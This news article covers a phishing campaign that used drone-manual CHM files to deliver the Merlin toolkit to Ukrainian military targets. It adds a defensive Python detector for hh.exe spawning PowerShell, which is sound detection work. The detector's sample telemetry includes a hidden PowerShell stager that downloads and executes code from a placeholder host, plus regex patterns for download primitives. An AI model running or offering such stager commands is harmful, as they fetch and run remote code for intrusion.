Ukrainian military organizations have fallen victim to a phishing campaign, with cyber attackers using drone manuals as bait to deliver a Go-based open-source post-exploitation toolkit known as Merlin.
Details about the campaign
Because drones or Unmanned Aerial Vehicles (UAVs) have become crucial tools for the Ukrainian military, there has been a surge in malware-laden lure files disguised as UAV service manuals, according to a report by Securonix researchers.
Image Description: Sample of malicious email
The cybersecurity company is tracking this campaign under the code name STARK#VORTEX.
Attack chain
- The attack begins with a Microsoft Compiled HTML Help (CHM) file. When the victim opens it, malicious JavaScript embedded in one of the archive's HTML pages runs.
- That JavaScript executes PowerShell commands that connect to a remote server and retrieve an obfuscated binary.
- Once decoded, this Windows payload drops the Merlin agent, which is configured to beacon to a command-and-control (C2) server, giving the attackers control of the compromised host.
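The chain above has a telemetry shape that does not depend on any particular hash or domain: Windows opens CHM files with the HTML Help viewer, hh.exe, so a CHM whose script launches PowerShell appears in process-creation logs as hh.exe spawning a shell that then reaches out for a payload. The following detection script is an added example written for this page; it is not Securonix's or CERT-UA's detection content, and it runs over constructed Sysmon Event ID 1 records (field names follow the Sysmon schema; the command lines and hosts are invented for illustration, not indicators from the campaign).

```python
"""
Flag hh.exe -> shell process chains with stager-like command lines.

Added example for this article, not code from Securonix or CERT-UA.
Input is constructed Sysmon Event ID 1 (process creation) records; the
command lines and the example.invalid hosts are invented for illustration.
"""
import re

# Windows opens .chm files with the HTML Help viewer. A CHM whose embedded
# JavaScript runs PowerShell shows up as hh.exe spawning a shell.
HELP_VIEWER = "hh.exe"
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Command-line features typical of a stager pulling a remote payload:
# encoded commands, download primitives, in-memory execution, hidden windows.
STAGER_PATTERNS = {
    "encoded_command": re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\b"),
    "remote_fetch": re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|net\.webclient|\biwr\b|\bcurl\b|\bwget\b"),
    "in_memory_exec": re.compile(r"(?i)\biex\b|invoke-expression"),
    "hidden_window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden|-nop\b|-noni\b"),
}


def basename(path):
    """Last path component, lower-cased, accepting either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event):
    """Return (score, reasons) for one Sysmon EID 1 record (dict)."""
    reasons = []
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")

    # Core signal: the help viewer launching an interpreter.
    if parent == HELP_VIEWER and child in SHELLS:
        reasons.append("hh.exe spawned " + child)
    # Supporting signals: only scored when the child is an interpreter,
    # so a browser download or a document reader does not match.
    if child in SHELLS:
        for name, pattern in STAGER_PATTERNS.items():
            if pattern.search(cmdline):
                reasons.append(name)
    return len(reasons), reasons


def detect(events, threshold=2):
    """Return the events scoring at or above threshold, with reasons."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({"event": ev, "score": score, "reasons": reasons})
    return hits


# Constructed sample telemetry (not real campaign data).
SAMPLE_EVENTS = [
    # Benign: a user opens a help file, no child process.
    {"Image": r"C:\Windows\hh.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\hh.exe" C:\Users\u\Downloads\UAV_manual.chm'},
    # Suspicious: the help viewer launches a hidden PowerShell that fetches
    # and runs remote code, mirroring the chain described in the article.
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\hh.exe",
     "CommandLine": r'''powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')"'''},
    # Admin activity: a download from an interactive console, no CHM parent.
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'powershell.exe -c "Invoke-WebRequest https://example.invalid/tool.zip -OutFile tool.zip"'},
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit["score"], hit["reasons"])
        print("  ", hit["event"]["CommandLine"])
```

Scoring on the parent/child relationship plus command-line behaviour, rather than on a file hash, is what lets the rule survive the obfuscation changes the researchers note; the third sample shows why the threshold matters, since a lone download cmdlet from an interactive console is routine administration.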
“While the attack chain appears straightforward, the attackers have employed rather sophisticated Tactics, Techniques, and Procedures (TTPs) and obfuscation methods to evade detection,” noted the researchers.
Has it happened before?
This is not the first time Ukrainian government entities have been targeted with the Merlin toolkit.
In early August 2023, the Computer Emergency Response Team of Ukraine (CERT-UA) disclosed a similar attack chain that employed CHM files as decoys to infect computers with this open-source tool.
CERT-UA attributed those intrusions to a threat actor it tracks as UAC-0154.
The researchers clarified,
“The files and documents in this attack chain are highly effective at evading defenses. Normally, receiving a Microsoft help file online would be considered unusual.”
However, the attackers crafted the lure documents to resemble something an unsuspecting victim might expect to encounter in a help-related document or file.
Ukraine War: Not only human lives but cyber resilience at risk
Using drone manuals as bait is a cunning way to exploit the military's reliance on UAVs, and the threat actors have become adept at chaining malicious JavaScript with PowerShell commands.
In a hostile environment, defending against cyber attacks is a constant challenge for the nation. Let's stand against war and cyber war together!